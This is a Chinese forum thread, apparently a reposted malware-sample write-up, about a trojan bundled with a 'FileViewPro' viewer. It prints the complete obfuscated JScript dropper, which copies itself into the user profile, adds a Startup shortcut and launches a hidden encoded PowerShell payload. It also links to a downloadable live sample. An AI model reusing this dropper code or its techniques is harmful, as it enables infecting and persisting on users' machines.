社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
  • 6150阅读
  • 2回复

[分享][PC样本分析] 新人分析

楼层直达
z3960 
级别: 茶馆馆主
发帖
770868
飞翔币
207694
威望
215657
飞扬币
2511641
信誉值
8

FileViewPro 万能查看器绿色版https://www.52pojie.cn/thread-1059431-1-1.html(出处: 吾爱破解论坛)样本连接:https://wwi.lanzouw.com/im1KLya83mh 密码:52pj@三木森啊该用户上传的软件捆绑木马病毒,通过360查出在线查毒:https://www.virustotal.com/gui/file/a8bb13a0dcec03fb452a53e985285b74c511eb7daacb9daa22dbb647705fba9b接下来开始进行解包

[JavaScript] 纯文本查看 复制代码

?[tr=none]
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
ERUJHTSETJSEJSEA = function(ObjN) {  ResName = new ActiveXObject(ObjN);  return ResName;};WScript.Sleep(5005);function ASDGHKFIASYLWGHAfi(str) {        splitString = str.split("");             reverseArray = splitString.reverse();              joinArray = reverseArray.join("");          return joinArray;}; aq = ASDGHKFIASYLWGHAfi("sj.muimorhC\atadppa\"); WScript.Sleep(2002); SETYa = ASDGHKFIASYLWGHAfi("tAFIFcejAFIFbOmetAFIFsySelAFIFiF.gAFIFniAFIFtpirAFIFcS"); SETYaa = SETYa.replace(/FIFA/g, ''); fso=WScript.CreateObject (SETYaa); zr = fso.FileExists(aq); if (zr == false) { WScript.Sleep(2002);SETYs = ASDGHKFIASYLWGHAfi("llAFIFeAFIFhS.tpiAFIFrcAFIFSW"); SETYss = SETYs.replace(/FIFA/g, ''); wscr = new ERUJHTSETJSEJSEA(SETYss); fso.CopyFile (WScript.ScriptFullName, wscr.ExpandEnvironmentStrings(ASDGHKFIASYLWGHAfi("%ELIFORPRESU%")) + aq , true); WScript.Sleep(8008); link = wscr.SpecialFolders(ASDGHKFIASYLWGHAfi("putratS"))+ASDGHKFIASYLWGHAfi("\")+ASDGHKFIASYLWGHAfi("knl.ini.muimorhC"); shortcut = wscr.CreateShortcut(link); shortcut.TargetPath = ASDGHKFIASYLWGHAfi("%ELIFORPRESU%") + aq; shortcut.Arguments = ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi(""));WScript.Sleep(1000);shortcut.Description = ASDGHKFIASYLWGHAfi("ini.muimorhC"); shortcut.IconLocation = ASDGHKFIASYLWGHAfi("96,lld.23LLEHS\23metsys\%tooRmetsyS%"); shortcut.WindowStyle = 4; shortcut.Save(); } WScript.Sleep(8008);try { setTimeout(ASDGHKFIASYLWGHAfi(ASDGHKFIASYLWGHAfi("")),888); } catch(f) {SETYy = ASDGHKFIASYLWGHAfi("eAFIFxAFIFeAFIF.lAFIFleAFIFhsAFIFrewAFIFoPAFIF"); SETYyy = SETYy.replace(/FIFA/g, '');C=SETYyy; BB=ASDGHKFIASYLWGHAfi(" e- tixeon- "); SD=ASDGHKFIASYLWGHAfi("wGADBgYAUGAXBgLAQHAlBgTAcCAgAAdAMGAlBgaAIGAPBQLAcHAlBgTAgCAoAwZA4GApBgcAQHATBANAYDAlBwcAEGAiBQbA8GAyBgRAoDA6AQXAQHAyBQZAYHAuBwbAMEAbBAKAQGAhBwbAwEAuAgbAkGAhBQbA8GAEBAdA4GAlBgcAIHA1BwQAoDA6AQXA4GApBQYA0GAvBARAAHAwBQQAsFAgAwOAgDAgAAcAUGAlBAbAMHAgAAI"); SV=ASDGHKFIASYLWGHAfi("GAwBQZAIHAuAQKAcCAzAAcA0GAuAgYA8CA0BQaAIGAvAQZAMGAhBAcAMHAuAgaAMHAzBQaAMHAvAwLAoDAwBAdAQHAoBwJAgCAnAwZA4GApBgcAQHATBAZAEGAvBAbA4GA3BwbAQEAnAgLAkCAnAAdA4GAlBQaA"); SF=ASDGHKFIASYLWGHAfi("AkCAsBAbAUHAuBAJAwCAsBAbAUHAuBAJAgCAlBwaA8GA2BgbAkGAuAAdA4GApBwbAAFA5BgcAQHAuBQRA4CApAQKAkCAnAQQAcCAsAwJA4HAhAgKA4FAnAAKAUGAjBQYAw"); wscr.Run(C+BB+SD+SV+SF,0,false); };
木马文件就是ID.js
关键词: bot 软件 360 新人 破解
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
级别: 超级版主
发帖
830456
飞翔币
224550
威望
224618
飞扬币
2422758
信誉值
0

只看该作者 1 发表于: 2022-01-09
来看一下
级别: 超级版主
发帖
830456
飞翔币
224550
威望
224618
飞扬币
2422758
信誉值
0

只看该作者 2 发表于: 2022-01-09
不错,了解了